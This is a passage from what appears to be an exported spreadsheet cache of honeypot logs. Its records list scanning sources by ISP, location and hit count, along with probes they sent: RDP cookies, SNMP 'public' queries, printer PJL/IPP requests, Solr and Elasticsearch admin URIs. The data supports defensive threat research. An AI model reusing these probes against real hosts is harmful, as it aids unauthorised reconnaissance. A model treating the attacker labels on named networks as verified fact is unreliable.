    <x v="1414"/>
    <x v="1414"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:58:40"/>
    <d v="2025-04-17T00:58:40"/>
    <d v="2025-04-17T00:58:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="19"/>
    <s v="Zanjan"/>
    <s v="NA"/>
    <s v="Zanjan"/>
    <s v="111453"/>
    <s v="NA"/>
    <s v="36.683"/>
    <s v="48.5087"/>
    <s v="58224"/>
    <s v="TCI"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="corporate"/>
    <s v="Zanjan telecom company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bb:80d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1415"/>
    <x v="1415"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:58:37"/>
    <d v="2024-06-11T06:16:00"/>
    <d v="2025-04-17T00:58:37"/>
    <n v="358"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_POP3_H3&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;445&amp;&amp;27719&amp;&amp;161&amp;&amp;23&amp;&amp;143&amp;&amp;3389&amp;&amp;21&amp;&amp;42070&amp;&amp;1521&amp;&amp;1080&amp;&amp;50389&amp;&amp;110&amp;&amp;NA&amp;&amp;51097&amp;&amp;8443&amp;&amp;3306&amp;&amp;5432&amp;&amp;55103&amp;&amp;57204&amp;&amp;6667&amp;&amp;1433&amp;&amp;55398&amp;&amp;443&amp;&amp;9100&amp;&amp;56326&amp;&amp;389&amp;&amp;49887&amp;&amp;5900&amp;&amp;80&amp;&amp;54282"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="None"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zRiPqTXpw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lDWOLM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VVksVa'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63116)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63128)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,63136)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qscdwBLms'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UyqhCw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KfCMEj'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XsKvQZyxy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VWhoDO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OYnQvc'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61190)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61198)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61208)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59190)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59202)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,59210)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gUAXAASRH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=STzqvf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rDtDgq'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,62550)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61038)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61044)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.231,61050)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SJyZxtAjb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uNYMov'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AhCTCM'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:84e7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1416"/>
    <x v="1416"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:29:48"/>
    <d v="2025-02-23T07:40:21"/>
    <d v="2025-04-17T00:29:48"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:19f0"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1417"/>
    <x v="1417"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:12:02"/>
    <d v="2025-03-20T19:12:39"/>
    <d v="2025-04-17T00:12:02"/>
    <n v="87"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="23&amp;&amp;21&amp;&amp;143&amp;&amp;110&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="Digital Ocean"/>
    <s v="None"/>
    <s v="DO-13"/>
    <s v="2024-05-07"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;POST&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': '.'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '209.145.61.177:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://209.145.61.177:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,32010)}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/info/system'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/cores?action=STATUS&amp;wt=json'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/query?q=SHOW+DIAGNOSTICS'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/?pretty'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/_cluster/health?pretty'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '474', 'Content-Type': 'application/xml', 'Host': '94.131.118.77:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/info/system'}}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/solr/admin/cores?action=STATUS&amp;wt=json'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.79.122:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,27522)}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '194.4.48.242:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (209.38.211.222,8206)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Content-Length': '473', 'Content-Type': 'application/xml', 'Host': '77.91.74.218:443', 'User-Agent': 'Go-http-client/1.1', 'X-Aggregate-Auth': '1', 'method': 'POST', 'uri': '/'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d126:d3de"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1418"/>
    <x v="1418"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:11:47"/>
    <d v="2025-04-17T00:07:28"/>
    <d v="2025-04-17T00:11:47"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RS"/>
    <s v="Rio Grande do Sul"/>
    <s v="Gravataí"/>
    <s v="Gravataí"/>
    <s v="3462089"/>
    <s v="NA"/>
    <s v="-29.9422"/>
    <s v="-50.9928"/>
    <s v="8167"/>
    <s v="V tal"/>
    <s v="V tal"/>
    <s v="business"/>
    <s v="Brasil Telecom S/A - Filial Distrito Federal"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b106:21ea"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1419"/>
    <x v="1419"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:11:17"/>
    <d v="2025-04-14T22:37:18"/>
    <d v="2025-04-17T00:11:17"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;43127&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="01"/>
    <s v="Johor"/>
    <s v="Daerah Batu Pahat"/>
    <s v="Parit Raja"/>
    <s v="1732698"/>
    <s v="NA"/>
    <s v="1.8681"/>
    <s v="103.112"/>
    <s v="9534"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="residential"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf0:1519"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1420"/>
    <x v="1420"/>
    <s v="125-227-204-12.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:10:06"/>
    <d v="2024-09-11T17:18:00"/>
    <d v="2025-04-17T00:10:06"/>
    <n v="121"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;41241&amp;&amp;80&amp;&amp;9100&amp;&amp;12997&amp;&amp;45713&amp;&amp;10876&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de3:cc0c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1421"/>
    <x v="1421"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T00:06:17"/>
    <d v="2025-04-17T00:06:17"/>
    <d v="2025-04-17T00:06:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
